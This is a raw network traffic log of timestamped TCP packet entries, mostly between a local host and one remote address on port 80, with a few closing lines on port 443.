Nov 9, 2024 02:47:36.097382069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097404003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097404003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097423077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097425938 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097443104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097448111 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097456932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097461939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097470045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097481012 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097481966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097498894 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097501993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097505093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097508907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097516060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097517967 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097527981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097538948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097551107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097551107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097564936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097572088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097594023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097599030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097610950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097619057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097624063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097635984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097644091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097647905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097661018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097661972 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097672939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097681046 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097688913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097706079 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097707033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097726107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097728014 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097743034 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097744942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097758055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097767115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097769976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097781897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097784042 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097794056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097805023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097805977 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097819090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097820044 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097831964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097842932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097851038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097855091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097870111 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097872972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097884893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097891092 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097898006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097908974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097909927 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097927094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097937107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097940922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097951889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097961903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097966909 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097979069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097991943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098000050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098011971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098021030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098025084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098037004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098037958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098050117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098062038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098066092 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098073006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098083973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098093987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098093987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098113060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098113060 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098131895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098131895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098145008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098155975 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098155975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098170042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098181963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098181963 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098195076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098206043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098212004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098217010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098228931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098229885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098247051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098258018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098261118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098285913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098285913 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098308086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098314047 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098320007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098331928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098334074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098345041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098345995 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098356009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098361969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098370075 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098378897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098380089 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098391056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098402977 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098402977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098416090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098426104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098431110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098438978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098443031 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098450899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098463058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098474026 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098474026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098494053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098503113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098506927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098516941 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098520994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098531961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098542929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098548889 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098553896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098567963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098577976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098582029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098591089 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098607063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098618984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098622084 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098630905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098648071 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098686934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098769903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098788977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098799944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098825932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098836899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098853111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098872900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098898888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098910093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098912001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098922968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098933935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098944902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098951101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098969936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098978996 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.098982096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.098995924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099008083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099009037 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099023104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099029064 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099040031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099052906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099056005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099069118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099083900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099104881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099127054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099524021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099641085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099653006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099664927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099675894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099684954 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099694014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099705935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099714994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099718094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099728107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099730968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099756002 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099785089 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099811077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099822998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099834919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099857092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099864960 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099889040 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099900961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099911928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099915028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.099942923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.099953890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100099087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100116014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100126982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100136995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100148916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100158930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100159883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100178957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100184917 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100192070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100208998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100208998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100218058 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100229025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100241899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100246906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100251913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100265026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100266933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100275993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100287914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100296974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100303888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100310087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100316048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100322962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100339890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100342035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100354910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100366116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100367069 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100378036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100395918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100414991 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100492954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100513935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100524902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100536108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100554943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100570917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100570917 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100586891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100626945 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100668907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100681067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100692034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100702047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100713015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100719929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100730896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100743055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100749969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100754976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100771904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100775003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100785017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100795984 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100796938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100810051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100811005 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100821972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100832939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100832939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100847960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100861073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100878954 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100883007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100897074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100903034 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100908995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100922108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100934982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100949049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100956917 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100960970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100971937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100980997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.100984097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.100994110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101000071 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101020098 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101042986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101335049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101383924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101525068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101536989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101555109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101562023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101572990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101584911 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101593018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101605892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101607084 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101619005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101625919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101630926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101643085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101650000 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101656914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101669073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101674080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101680994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101691961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101696968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101706982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101718903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101718903 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101732016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101742029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101746082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101758003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.101769924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101783037 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.101809025 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.102370977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102384090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102395058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102406025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102422953 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.102425098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102438927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102448940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102453947 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.102461100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102463007 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.102474928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102485895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102485895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.102499962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102509975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.102523088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.102535963 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.102561951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.111577988 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.111603975 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.111627102 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.111675978 CET	53057	443	192.168.2.7	13.91.96.185
